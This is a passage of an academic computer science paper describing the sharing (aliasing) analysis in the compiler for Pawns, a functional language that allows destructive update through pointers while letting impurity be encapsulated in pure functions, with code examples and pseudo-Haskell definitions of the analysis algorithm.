lee@unimelb.edu.au Academic editor Evelyn Duesterwald Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.22 Copyright 2015 Naish Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Sharing analysis in the Pawns compiler Lee Naish Computing and Information Systems, University of Melbourne, Melbourne, Australia ABSTRACT Pawns is a programming language under development that supports algebraic data types, polymorphism, higher order functions and “pure” declarative programming. It also supports impure imperative features including destructive update of shared data structures via pointers, allowing significantly increased efficiency for some operations. A novelty of Pawns is that all impure “effects” must be made obvious in the source code and they can be safely encapsulated in pure functions in a way that is checked by the compiler. Execution of a pure function can perform destructive updates on data structures that are local to or eventually returned from the function without risking modification of the data structures passed to the function. This paper describes the sharing analysis which allows impurity to be encapsulated. Aspects of the analysis are similar to other published work, but in addition it handles explicit pointers and destructive update, higher order functions including closures and pre- and post-conditions concerning sharing for functions. Subjects Programming Languages Keywords Functional programming language, Algebraic data type, Destructive update, Mutability, Effects, Aliasing analysis, Sharing analysis INTRODUCTION This paper describes the sharing analysis done by the compiler for Pawns (Naish, 2015), a programming language that is currently under development. Pawns supports both declarative and imperative styles of programming. It supports algebraic data types, polymorphism, higher order programming and “pure” declarative functions, allowing very high level reasoning about code. It also allows imperative code, where programmers can consider the representation of data types, obtain pointers to the arguments of data constructors and destructively update them. Such code requires the programmer to reason at a much lower level and consider aliasing of pointers and sharing of data structures. Low level “impure” code can be encapsulated within a pure interface and the compiler checks the purity. This requires analysis of pointer aliasing and data structure sharing, to distinguish data structures that are only visible to the low level code (and are therefore safe to update) from data structures that are passed in from the high level code (for which update would violate purity). The main aim of Pawns is to get the benefits of purity for most code but still have the ability to write some key components using an imperative style, which can significantly improve efficiency (for example, a more than twenty-fold increase in the speed of inserting an element into a binary search tree). There are other functional programming languages, such as ML (Milner, Tofte & Macqueen, 1997), Haskell (Jones et al., 1999) and Disciple (Lippmeier, 2009), that allow destructive update of shared data structures but do not allow this impurity to be How to cite this article Naish (2015), Sharing analysis in the Pawns compiler. PeerJ Comput. Sci. 1:e22; DOI 10.7717/peerj-cs.22 mailto:lee@unimelb.edu.au https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.22 http://dx.doi.org/10.7717/peerj-cs.22 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 encapsulated. In these languages, the ability to update the data structure is connected to its type.1 For a data structure to be built using destructive update, its type must allow 1 Disciple uses “region” information to augment types, with similar consequences. destructive update and any code that uses the data structure can potentially update it as well. This prevents simple declarative analysis of the code and can lead to a proliferation of different versions of a data structure, with different parts being mutable. For example, there are four different versions of lists, since both the list elements and the “spine” may (or may not) be mutable, and sixteen different versions of lists of pairs. There is often an efficiency penalty as well, with destructive update requiring an extra level of indirection in the data structure (an explicit “reference” in the type with most versions of ML and Haskell). Pawns avoids this inefficiency and separates mutability from type information, allowing a data structure to be mutable in some contexts and considered “pure” in others. The main cost from the programmer perspective is the need to include extra annotations and information in the source code. This can also be considered a benefit, as it provides useful documentation and error checking. The main implementation cost is additional analysis done by the compiler, which is the focus of this paper. The rest of this paper assumes some familiarity with Haskell and is structured as follows. ‘An Overview of Pawn’ gives a brief overview of the relevant features of Pawns. An early pass of the compiler translates Pawns programs into a simpler “core” language; this is described in ‘Core Pawns.’ ‘The Abstract Domain’ describes the abstract domain used for the sharing analysis algorithm, ‘The Sharing Analysis Algorithm’ defines the algorithm itself and ‘Example’ gives an extended example. ‘Discussion’ briefly discusses precision and efficiency issues. ‘Related Work’ discusses related work and ‘Conclusion’ concludes. AN OVERVIEW OF PAWNS A more detailed introduction to Pawns is given in (Naish, 2015). Pawns has many similarities with other functional languages. It supports algebraic data types with parametric polymorphism, higher order programming and curried function definitions. It uses strict evaluation. In addition, it supports destructive update via “references” (pointers) and has a variety of extra annotations to make impure effects more clear from the source code and allow them to be encapsulated in pure code. Pawns also supports a form of global variables (called state variables) which support encapsulated effects, but we do not discuss them further here as they are handled in essentially the same way as other variables in sharing analysis. Pure code can be thought of in a declarative way, where values can be viewed abstractly, without considering how they are represented. Code that uses destructive update must be viewed at a lower level, considering the representation of values, including sharing. We discuss this lower level view first, then briefly present how impurity can be encapsulated to support the high level view. We use Haskell-like syntax for familiarity. The low level view Values in Pawns are represented as follows. Constants (data constructors with no arguments) are represented using a value in a single word. A data constructor with N > 0 arguments is represented using a word that contains a tagged pointer to a block of N words Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 2/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 in main memory containing the arguments. For simple data types such as lists, the tag may be empty. In more complex cases, some bits of the pointer may be used and/or a tag may be stored in a word in main memory along with the arguments. Note that constants and tagged pointers are not always stored in main memory and Pawns variables may correspond to registers that contain the value. Only the arguments of data constructors are guaranteed to be in main memory. An array of size N is represented in the same way as a data constructor with N arguments, with the size given by the tag. Functions are represented as either a constant (for functions that are known statically) or a closure which is a data constructor with a known function and a number of other arguments. Pawns has a Ref t type constructor, representing a reference/pointer to a value of type t (which must be stored in memory). Conceptually, we can think of a corresponding Ref data constructor with a single argument, but this is never explicit in Pawns code. Instead, there is an explicit dereference operation: *vp denotes the value vp points to. There are two ways references can be created: let bindings and pattern bindings. A let binding *vp = val allocates a word in main memory, initializes it to val and makes vp a reference to it (Pawns omits Haskell’s let and in keywords; the scope is the following sequence of statements/expressions). In a pattern binding, if *vp is the argument of a data constructor pattern, vp is bound to a reference to the corresponding argument of the data constructor if pattern matching succeeds (there is also a primitive that returns a reference to the ith element of an array). Note it is not possible to obtain a reference to a Pawns variable: variables do not denote memory locations. However, a variable vp of type Ref t denotes a reference to a memory location containing a value of type t and the memory location can be destructively updated by *vp := val. Consider the following code. Two data types are defined. The code creates a reference to Nil (Nil is stored in a newly allocated memory word) and a reference to that reference (a pointer to the word containing Nil is put in another allocated word). It also creates a list containing constants Blue and Red (requiring the allocation of two cons cells in memory; the Nil is copied). It deconstructs the list to obtain pointers to the head and tail of the list (the two words in the first cons cell) then destructively updates the head of the list to be Red. data Colour = Red | Green | Blue data Colours = Nil | Cons Colour Colours -- like [Colour] ... *np = Nil -- np = ref to (copy of) Nil *npp = np -- npp = ref to (copy of) np cols = Cons Blue (Cons Red *np) -- cols = [Blue, Red] case cols of (Cons *headp *tailp) -> -- get ref to head and tail *headp := Red -- update head with Red Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 3/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 The memory layout after the assignment can be pictured as follows, where boxes represent main memory words and Ref and Cons followed by an arrow represent pointers (no tag is used in either case): The destructive update above changes the values of both headp and cols (the representations are shared). One of the novel features of Pawns is that the source code must be annotated with “!” to make it obvious when each “live” variable is updated. If both headp and cols are used later, the assignment statement above must be written as follows, with headp prefixed with “!” and an additional annotation attached to the whole statement indicating cols may be updated: *!headp := Red !cols -- update *headp (and cols) We say that the statement directly updates headp and indirectly updates cols, due to sharing of representations. Similarly, if headp was passed to a function that may update it, additional annotations are required. For example, (assign !headp Red) !cols makes the direct update of headp and indirect update of cols clear. Sharing analysis is used to ensure that source code contains all the necessary annotations. One aim of Pawns is that any effects of code should be made clear by the code. Pawns is an acronym for Pointer Assignment With No Surprises. Pawns functions have extra annotations in type signatures to document which arguments may be updated. For additional documentation, and help in sharing analysis, there are annotations to declare what sharing may exist between arguments when the function is called (a precondition) and what extra sharing may be added by executing the function (called a postcondition, though it is the union of the pre- and post-condition that must be satisfied after a function is executed). For example, we may have: assign :: Ref t -> t -> () sharing assign !p v = _ -- p may be updated pre nosharing -- p&v don’t share when called post *p = v -- assign may make *p alias with v assign !p v = *!p := v The “!” annotation on parameter p declares the first argument of assign is mutable. The default is that arguments are not mutable. As well as checking for annotations on assignments and function calls, sharing analysis is used to check that all parameters which may be updated are declared mutable in type signatures, and pre- and post-conditions are always satisfied. For example, assuming the previous code which binds cols, the call assign !tailp !cols annotates all modified variables but violates the precondition Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 4/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 of assign because there is sharing between tailp and cols at the time of the call. Violating this precondition allows cyclic structures to be created, which is important for understanding the code. If the precondition was dropped, the second argument of assign would also need to be declared mutable in the type signature and the assignment to p would require v to be annotated. In general, there is an inter-dependence between “!” annotations in the code and pre- and post-conditions. More possible sharing at a call means more “!” annotations are needed, more sharing in (recursive) calls and more sharing when the function returns. Curried functions and higher order code are supported by attaching sharing and destructive update information to each arrow in a type, though often the information is inferred rather than being given explicitly in the source code. For example, implicit in the declaration for assign above is that assign called with a single argument of type Ref t creates a closure of type t ->() containing that argument (and thus sharing the object of type t). The explicit sharing information describes applications of this closure to another argument. There is a single argument in this application, referred to with the formal parameter v. The other formal parameter, p, refers to the argument of the closure. In general, a type with N arrows in the “spine” has K + N formal parameters in the description of sharing, with the first K parameters being closure arguments. The following code defines binary search trees of integers and defines a function that takes a pointer to a tree and inserts an integer into the tree. It uses destructive update, as would normally be done in an imperative language. The declarative alternative must reconstruct all nodes in the path from the root down to the new node. Experiments using our prototype implementation of Pawns indicate that for long paths this destructive update version is as fast as hand-written C code whereas the “pure” version is more than twenty times slower, primarily due to the overhead of memory allocation. data Tree = TNil | Node Tree Int Tree bst_insert_du :: Int -> Ref Tree -> () sharing bst_insert_du x !tp = _ -- tree gets updated pre nosharing -- integers are atomic so post nosharing -- it doesn’t share bst_insert_du x !tp = case *tp of TNil -> *!tp := Node TNil x TNil -- insert new node (Node *lp n *rp) -> if x <= n then (bst_insert_du x !lp) !tp -- update lp (and tp) else (bst_insert_du x !rp) !tp -- update rp (and tp) Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 5/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 The high level view Whenever destructive update is used in Pawns, programmers must be aware of potential sharing of data representations and take a low-level view. In other cases, it is desirable to have a high level view of values, ignoring how they are represented and any sharing that may be present. For example, in the two trees t1 and t2 depicted below, it is much simpler if we do not have to care or know about the sharing between the trees and within tree t1. The high level view is they are both just Node (Node TNil 123 TNil) 123 (Node TNil 123 TNil). Pawns has a mechanism to indicate that the high level view is taken. Pre- and post-conditions can specify sharing with a special pseudo-variable named abstract.2 The 2 There is conceptually a different abstract variable for each distinct type. sharing analysis of the Pawns compiler allows a distinction between “abstract” variables, which share with abstract and for which the programmer takes a high level view, and “concrete” variables for which the programmer must understand the representation and explicitly declare all sharing in pre- and post-conditions. The analysis checks that no live abstract variables can be destructively updated. Thus, if a function has a parameter which is updated, it must be declared mutable and must not be declared to share with abstract in the precondition (non-mutable parameters may or may not share with abstract). Checking of preconditions ensures that abstract variables are not passed to functions which expect concrete data structures. For example, an abstract tree cannot be passed to bst insert du because the precondition allows no sharing with abstract. It is important that the tree structure is known when bst insert du is used because the result depends on it. For example, inserting into the right subtree of t2 only affects this subtree whereas inserting into the right subtree of t1 (which has the same high level value) also changes the left subtree of both t1 and t2. Note that concrete variables can be passed to functions which allow abstract arguments. Pawns type signatures that have no annotations concerning destructive update or sharing implicitly indicate no arguments are destructively updated and the arguments and result share with abstract. Thus, a subset of Pawns code can look like and be considered as pure functional code. The following code defines a function that takes a list of integers and returns a binary search tree containing the same integers. Though it uses destructive update internally, this impurity is encapsulated and it can therefore be viewed as a pure function. The list that is passed in as an argument is never updated and the tree returned is abstract so it is never subsequently updated (a concrete tree could be returned if an explicit postcondition without t = abstract was given). An initially empty tree is created locally. It is destructively updated by inserting each integer of the list into it (using list bst du, which calls bst insert du), then the tree is returned. Within the execution of list bst Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 6/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 it is important to understand the low level details of how the tree is represented, but this information is not needed outside the call. data Ints = Nil | Cons Int Ints list_bst :: Ints -> Tree -- pure function from Ints to Tree -- implicit sharing information: -- sharing list_bst xs = t -- pre xs = abstract -- post t = abstract list_bst xs = *tp = TNil -- create pointer to empty tree list_bst_du xs !tp -- insert integers into tree *tp -- return (updated) tree list_bst_du :: Ints -> Ref Tree -> () sharing list_bst_du xs !tp = _ -- tree gets updated pre xs = abstract post nosharing list_bst_du xs !tp = case xs of (Cons x xs1) -> bst_insert_du x !tp -- insert head of list into tree list_bst_du xs1 !tp -- insert rest of list into tree Nil -> () CORE PAWNS An early pass of the Pawns compiler converts all function definitions into a core language by flattening nested expressions, introducing extra variables et cetera. A variable represent- ing the return value of the function is introduced and expressions are converted to bindings for variables. A representation of the core language version of code is annotated with type, liveness and other information prior to sharing analysis. We just describe the core language here. The right side of each function definition is a statement (described using the definition of type Stat below), which may contain variables, including function names (Var), data constructors (DCons) and pairs containing a pattern (Pat) and statement for case statements. All variables are distinct except for those in recursive instances of Stat and variables are renamed to avoid any ambiguity due to scope. data Stat = -- Statement, eg Seq Stat Stat | -- stat1 ; stat2 EqVar Var Var | -- v = v1 EqDeref Var Var | -- v = *v1 Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 7/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 DerefEq Var Var | -- *v = v1 DC Var DCons [Var] | -- v = Cons v1 v2 Case Var [(Pat, Stat)] | -- case v of pat1 -> stat1 ... Error | -- (for uncovered cases) App Var Var [Var] | -- v = f v1 v2 Assign Var Var | -- *!v := v1 Instype Var Var -- v = v1::instance_of_v1_type data Pat = -- patterns for case, eg Pat DCons [Var] -- (Cons *v1 *v2) Patterns in the core language only bind references to arguments — the arguments themselves must be obtained by explicit dereference operations. Pawns supports “default” patterns but for simplicity of presentation here we assume all patterns are covered in core Pawns and we include an error primitive. Similarly, we just give the general case for application of a variable to N > 0 arguments; our implementation distinguishes some special cases. Memory is allocated for DerefEq, DC (for non-constants) and App (for unsaturated applications which result in a closure). The runtime behaviour of Instype is identical to EqVar but it is treated differently in type analysis. Sharing and type analysis cannot be entirely separated. Destructive update in the presence of polymorphic types can potentially violate type safety or “preservation”— see Wright (1995), for example. For a variable whose type is polymorphic (contains a type variable), we must avoid assigning a value with a less general type. For example, in *x = [] the type of *x is “list of t”, where t is a type variable. Without destructive update, it should be possible to use *x wherever a list of any type is expected. However, if *x is then assigned a list containing integers (which has a less general type), passing it to a function that expects a list of functions violates type safety (“calling” an arbitrary integer is not safe). Pawns allows expressions to have their inferred types further instantiated using “::”, and the type checking pass of the compiler also inserts some type instantiation. The type checking pass ensures that direct update does not involve type instantiation but to improve flexibility, indirect update is checked during the sharing analysis. THE ABSTRACT DOMAIN The representation of the value of a variable includes some set of main memory words (arguments of data constructors). Two variables share if the intersection of their sets of main memory words is not empty. The abstract domain for sharing analysis must maintain a conservative approximation to all sharing, so we can tell if two variables possibly share (or definitely do not share). The abstract domain we use is a set of pairs (representing possibly intersecting sets of main memory locations) of variable components. The different components of a variable partition the set of main memory words for the variable. The components of a variable depend on its type. For non-recursive types other than arrays, each possible data constructor argument is represented separately. For example, the type Maybe (Maybe (Either Int Int)) can have an argument of an outer Just Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 8/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 data constructor, an inner Just and Left and Right. A component can be represented using a list of x.y pairs containing a data constructor and an argument number, giving the path from the outermost data constructor to the given argument. For example, the components of the type above can be written as: [Just.1], [Just.1,Just.1], [Just.1,Just.1,Left.1] and [Just.1,Just.1,Right.1]. If variable v has value Just Nothing, the expression v.[Just.1] represents the single main memory word containing the occurrence of Nothing. For Ref t types we proceed as if there was a Ref data constructor, so vp.[Ref.1] represents the word vp points to. For function types, values may be closures. A closure that has had K arguments supplied is represented as a data constructor ClK with these K arguments; these behave in the same way as other data constructor arguments with respect to sharing, except Pawns provides no way to obtain a pointer to a closure argument. Closures also contain a code pointer and an integer which are not relevant to sharing so they are ignored in the analysis. We also ignore the subscript on the data constructor for sharing analysis because type and sharing analysis only give a lower bound on the number of closure arguments. Our analysis orders closure arguments so that the most recently supplied argument is first (the reverse of the more natural ordering). Consider the code below, where foo is a function that is defined with four or more arguments. The sharing analysis proceeds as if the memory layout was as depicted in the diagram. The pre- and post-conditions of foo are part of the type information associated with c1, c2 and c3. For arrays, [Array .1] is used to represent all words in the array. The expression, x.[Array .1,Just.1] represents the arguments of all Just elements in an array x of Maybe values. For recursive types, paths are “folded” (Bruynooghe, 1986) so there are a finite number of components. If a type T has sub-component(s) of type T we use the empty path to denote the sub-component(s). In general, we construct a path from the top level and if we come across a sub-component of type T that is in the list of ancestor types (the top level type followed by the types of elements of the path constructed so far) we just use the path to the ancestor to represent the sub-component. Consider the following mutually recursive types that can be used to represent trees which consist of a node containing an integer and a list of sub-trees: data RTrees = Nil | Cons RTree RTrees data RTree = RNode Int RTrees For type RTrees we have the components [] (this folded path represents both [Cons.2] and [Cons.1,RNode.2], since they are of type RTrees), [Cons.1] and [Cons.1,RNode.1]. The expression t.[Cons.1,RNode.1] represents the set of Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 9/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 memory words that are the first argument of RNode in variable t of type RTrees. For type RTree we have the components [] (for [RNode.2,Cons.1], of type RTree), [RNode.1] and [RNode.2] (which is also the folded version of [RNode.2,Cons.2], of type RTrees). In our sharing analysis algorithm we use a function fc (fold component) which takes a v.c pair, and returns v.c′ where c′ is the correctly folded component for the type of variable v. For example, fc (ts.[Cons.2]) = ts.[], assuming ts has type RTrees. As well as containing pairs of components for distinct variables which may alias, the abstract domain contains “self-alias” pairs for each possible component of a variable which may exist. Consider the following two bindings and the corresponding diagram (as with Cons, no tag is used for RNode): With our domain, the most precise description of sharing after these two bindings is as follows. We represent an alias pair as a set of two variable components. The first five are self-alias pairs and the other two describe the sharing between t and ts. {{t.[RNode.1], t.[RNode.1]}, {t.[RNode.2], t.[RNode.2]}, {ts.[], ts.[]}, {ts.[Cons.1], ts.[Cons.1]}, {ts.[Cons.1,RNode.1], ts.[Cons.1,RNode.1]}, {t.[RNode.1], ts.[Cons.1,RNode.1]}, {t.[RNode.2], ts.[]}} Note there is no self-alias pair for t.[] since there is no strict sub-part of t that is an RTree. Similarly, there is no alias between ts.[Cons.1] and any part of t. Although the value t is used as the first argument of Cons in ts, this is not a main memory word that is used to represent the value of t (indeed, the value of t has no Cons cells). The tagged pointer value stored in variable t (which may be in a register) is copied into the cons cell. Such descriptions of sharing are an abstraction of computation states. The set above abstracts all computation states in which t is a tree with a single node, ts is a list of trees, elements of ts may be t or have t as a subtree, and there are no other live variables with non-atomic values. THE SHARING ANALYSIS ALGORITHM We now describe the sharing analysis algorithm. Overall, the compiler attempts to find a proof that for a computation with a depth D of (possibly recursive) function calls, the following condition C holds, assuming C holds for all computations of depth less than D. This allows a proof by induction that C holds for all computations that terminate normally. C: For all functions f , if the precondition of f is satisfied (abstracts the computation state) whenever f is called, then Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 10/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 1. for all function calls and assignment statements in f , any live variable that may be updated at that point in an execution of f is annotated with “!”, 2. there is no update of live “abstract” variables when executing f , 3. all parameters of f which may be updated when executing f are declared mutable in the type signature of f , 4. the union of the pre- and post-conditions of f abstracts the state when f returns plus the values of mutable parameters in all states during the execution of f , 5. for all function calls and assignment statements in f , any live variable that may be directly updated at that point is updated with a value of the same type or a more general type, and 6. for all function calls and assignment statements in f , any live variable that may be indirectly updated at that point only shares with variables of the same type or a more general type. The algorithm is applied to each function definition in core Pawns to compute an approximation to the sharing before and after each statement (we call it the alias set). This can be used to check points 1, 2, 4 and 6 above. The algorithm checks that preconditions are satisfied for each function call, allowing the induction hypothesis to be used. Point 3 is established using point 1 and a simple syntactic check that any parameter of f that is annotated “!” in the definition is declared mutable in the type signature (parameters are considered live throughout the definition). Point 5 relies on 3 and the type checking pass. The core of the algorithm is to compute the alias set after a statement, given the alias set before the statement. This is applied recursively for compound statements in a form of abstract execution. Note that for point 4, if a statement changes the set of memory cells used to represent a mutable parameter, the algorithm computes the sharing for the union of the two sets of cells. We do not prove correctness of the algorithm but hope our presentation is sufficiently detailed to have uncovered any bugs. A proof would have a separate case for each kind of statement in the core language, showing that if the initial alias set abstracts the execution state before the statement the resulting alias set abstracts the execution state after the statement. This would require a more formal description of execution states and their relationship with the core language and the abstract domain. The abstract domain relies on type information so the sharing analysis relies on type preservation in the execution. Type preservation also relies on sharing analysis. Thus, a completely formal approach must tackle both problems together. Although our approach is not formal, we do state the key condition C, which has points relating to both sharing and types, and we include Instype in the core language. The alias set used at the start of a definition is the precondition of the function. This implicitly includes self-alias pairs for all variable components of the arguments of the function and the pseudo-variables abstractT for each type T used. Similarly, the postcondition implicitly includes self-alias pairs for all components of the result (and the abstractT variable if the result is abstract). 3 As abstract execution proceeds, extra 3 Self-aliasing for arguments and results is usually desired. For the rare cases it is not, we may provide a mechanism to override this default in the future. Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 11/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 variables from the function body are added to the alias set and variables that are no longer live can be removed to improve efficiency. For each program point, the computed alias set abstracts the computation state at that point in all concrete executions of the function that satisfy the precondition. For mutable parameters of the function, the sharing computed also includes the sharing from previous program points. The reason for this special treatment is explained when we discuss the analysis of function application. The alias set computed for the end of the definition, with sharing for local variables removed, must be a subset of the union of the pre- and post-condition of the function. Before sharing analysis, a type checking/inference pass is completed which assigns a type to each variable and function application. This determines the components for each variable. Polymorphism is also eliminated as follows. Suppose we have a function take n xs, which returns the list containing the first n elements of xs: take :: Int -> [a] -> [a] sharing take n xs = ys pre nosharing post ys = xs For each call to take, the pre- and post-conditions are determined based on the type of the application. An application to lists of Booleans will have two components for each variable whereas an application to lists of lists of Booleans will have four. When analysing the definition of take we instantiate type variables such as a above to Ref (). This type has a single component which can be shared to represent possible sharing of arbitrary components of an arbitrary type. Type checking prevents sharing between non-identical types, such as [a] and [b]. Finally, we assume there is no type which is an infinite chain of refs, for example, type Refs = Ref Refs (for which type folding results in an empty component rather than a [Ref.1] component; this is not a practical limitation). Suppose a0 is the alias set just before statement s. The following algorithm computes alias(s,a0), the alias set just after statement s. The algorithm structure follows the recursive definition of statements and we describe it using pseudo-Haskell, interspersed with discussion. The empty list is written [], non-empty lists are written [a,b,c] or a:b:c:[] and ++ denotes list concatenation. At some points we use high level declarative set comprehensions to describe what is computed and naive implementation may not lead to the best performance. alias (Seq stat1 stat2) a0 = -- stat1; stat2 alias stat2 (alias stat1 a0) alias (EqVar v1 v2) a0 = -- v1 = v2 let self1 = {{v1.c1,v1.c2}|{v2.c1,v2.c2} ∈ a0} share1 = {{v1.c1,v.c2}|{v2.c1,v.c2} ∈ a0} in a0 ∪ self1 ∪ share1 Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 12/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 alias (DerefEq v1 v2) a0 = -- *v1 = v2 let self1 = {{v1.[Ref.1],v1.[Ref.1]}} ∪ {{fc(v1.(Ref.1:c1)),fc(v1.(Ref.1:c2))}|{v2.c1,v2.c2} ∈ a0} share1 = {{fc(v1.(Ref.1:c1)),v.c2}|{v2.c1,v.c2} ∈ a0} in a0 ∪ self1 ∪ share1 Sequencing is handled by function composition. To bind a fresh variable v1 to a variable v2, the self-aliasing of v2 (including aliasing between different components of v2) is duplicated for v1 and the aliasing for each component of v2 (which includes self-aliasing) is duplicated for v1. Binding *v1 to v2 is done in a similar way, but the components of v1 must have Ref.1 prepended to them and the result folded, and the [Ref.1] component of v1 self-aliases. Folding is only needed for the rare case of types with recursion through Ref. alias (Assign v1 v2) a0 = -- *v1 := v2 let -- al = possible aliases for v1.[Ref.1] al = {va.ca | {v1.[Ref.1],va.ca} ∈ a0} -- (live variables in al, which includes v1, must be -- annotated with ! and must not share with abstract) self1al = {{fc(va.(ca++c1)), fc(vb.(cb++c2))}| va.ca ∈ al ∧ vb.cb ∈ al ∧ {v2.c1,v2.c2} ∈ a0} share1al = {{fc(va.(ca++c1)),v.c2} | va.ca ∈ al ∧ {v2.c1,v.c2} ∈ a0} in if v1 is a mutable parameter then a0 ∪ self1al ∪ share1al else let -- old1 = old aliases for v1, which can be removed old1 = {{v1.(Ref.1:d:c1),v.c2} | {v1.(Ref.1:d:c1),v.c2} ∈ a0} in (a0 \ old1) ∪ self1al ∪ share1al Assignment to an existing variable differs from binding a fresh variable in three ways. First, self-sharing for v1.[Ref.1] is not added since it already exists. Second, v1.[Ref.1] may alias several variable components (the live subset of these variables must be annotated with “!” on the assignment statement; checking such annotations is a primary purpose of the analysis). All these variables end up sharing with v2 and what v2 shares with (via share1al) plus themselves and each other (via self1al). The components must be concatenated and folded appropriately. Third, if v1 is not a mutable parameter the existing sharing with a path strictly longer than [Ref.1] (that is, paths of the form Ref.1 :d : c1) can safely be removed, improving precision. The component v1.[Ref.1] represents the single memory word that is overwritten and whatever the old contents shared with is no longer needed to describe the sharing for v1. For mutable parameters the old value may share with variables from the calling context and we retain this information, as explained Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 13/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 later. Consider the example below, where t and ts are as before and local variables v1 and v3 are references to the element of ts. The value assigned, v2, is RNode 3 (Cons (RNode 4 Nil) Nil). There is aliasing of v1.[Ref.1], v3.[Ref.1] and ts.[Cons.1] so all these variables have the sharing of v2 and self-sharing added. Generally we must also add sharing between all pairs of these variables. For example, {ts.[Cons.1], v3.[Ref.1,RNode.2,Cons.1]} must be added because the Cons component of v3 did not previously exist. The old sharing of v1 with t is discarded. Note that we cannot discard the old sharing of ts and v3 with t for two reasons. First, no definite aliasing information is maintained, so we cannot be sure v3 or ts are modified at all. Second, the assignment updates only one memory word whereas there may be other words also represented by ts.[Cons.1]. In some cases, the old sharing of v1 is discarded and immediately added again. Consider the following example, which creates a cyclic list. The sharing between v1 and v3 is discarded but added again (via share1al) because v2 also shares with v3. Correctness of the algorithm when cyclic terms are created depends on the abstract domain we use. A more expressive domain could distinguish between different cons cells in a list. For example, if types are “folded” at the third level of recursion rather than the first, the domain can distinguish three classes of cons cells, where the distance from the first cons cell, modulo three, is zero, one or two. For a cyclic list with a single cons cell, that cons cell must be in all three classes and our algorithm would need modification to achieve this. However, in our domain types are folded at the first level of recursion so we have a unique folded path for each memory cell in cyclic data structure (cyclic terms can only be created with recursive types). There is no distinction between the first and second cons cell in a list, for example. Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 14/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 alias (DC v dc [v1,... vN]) a0 = -- v = Dc v1...vN let self1 = {{fc(v.[dc.i]), fc(v.[dc.i])} | 1 ≤ i ≤ N} ∪ {{fc(v.(dc.i:c1)),fc(v.(dc.j:c2))} | {vi.c1,vj.c2} ∈ a0} share1 = {{fc(v.(dc.i:c1)),w.c2} | {vi.c1,w.c2} ∈ a0} in a0 ∪ self1 ∪ share1 The DerefEq case can be seen as equivalent to v1 = Ref v2 and binding a variable to a data constructor with N variable arguments is a generalisation. If there are multiple vi that share, the corresponding components of v must also share; these pairs are included in self1. alias (EqDeref v1 v2) a0 = -- v1 = *v2 let self1 = {{v1.c1,v1.c2} | {fc(v2.(Ref.1:c1)),fc(v2.(Ref.1:c2))} ∈ a0} share1 = {{v1.c1,v.c2} | {fc(v2.(Ref.1:c1)),v.c2} ∈ a0 empty1 = {{v1.[],v.c} | {v1.[],v.c} ∈ (self1 ∪ share1) in if the type of v1 has a [] component then a0 ∪ self1 ∪ share1 else --- avoid bogus sharing with empty component (a0 ∪ self1 ∪ share1)\ empty1 The EqDeref case is similar to the inverse of DerefEq in that we are removing Ref.1 rather than prepending it (the definition implicitly uses the inverse of fc). However, if the empty component results we must check that such a component exists for the type of v1. alias (App v f [v1,... vN]) a0 = -- v = f v1...vN let "f(w1, ... wK+ N) = r" is used to declare sharing for f mut = the arguments that are declared mutable post = the postcondition of f along with the sharing for mutable arguments from the precondition, with parameters and result renamed with f.[Cl.K],... f.[Cl.1],v1,... vN and v, respectively -- (the renamed precondition of f must be a subset of a0, -- and mutable arguments of f and live variables they share -- with must be annotated with ! and must not share with -- abstract) -- selfc+sharec needed for possible closure creation selfc = {{v.[Cl.i],v.[Cl.i] | 1 ≤ i ≤ N} ∪ {{v.((Cl.(N + 1 − i)):c1),v.((Cl.(N+1-j)):c2)} | {vi.c1,vj.c2} ∈ a0} ∪ {{v.((Cl.(i + N)):c1),v.((Cl.(j + N)):c2)} | {f.((Cl.i):c1),f.((Cl.j):c2)} ∈ a0} sharec = {{v.((Cl.(N + 1 − i)):c1),x.c2} | {vi.c1,x.c2)} ∈ a0} ∪ {{v.((Cl.(i + N)):c1),x.c2 | {f.((Cl.i):c1),x.c2} ∈ a0} -- postt+postm needed for possible function call postt = {{x1.c1,x3.c3} | {x1.c1,x2.c2} ∈ post ∧{x2.c2,x3.c3} ∈ a0} Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 15/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 postm = {{x1.c1,x2.c2} | {x1.c1,vi.c3} ∈ a0} ∧ {x2.c2,vj.c4} ∈ a0 ∧ {vi.c3,vj.c4} ∈ post ∧vi ∈ mut ∧ vj ∈ mut} in a0 ∪ selfc ∪ sharec ∪ postt ∪ postm For many App occurrences, the function 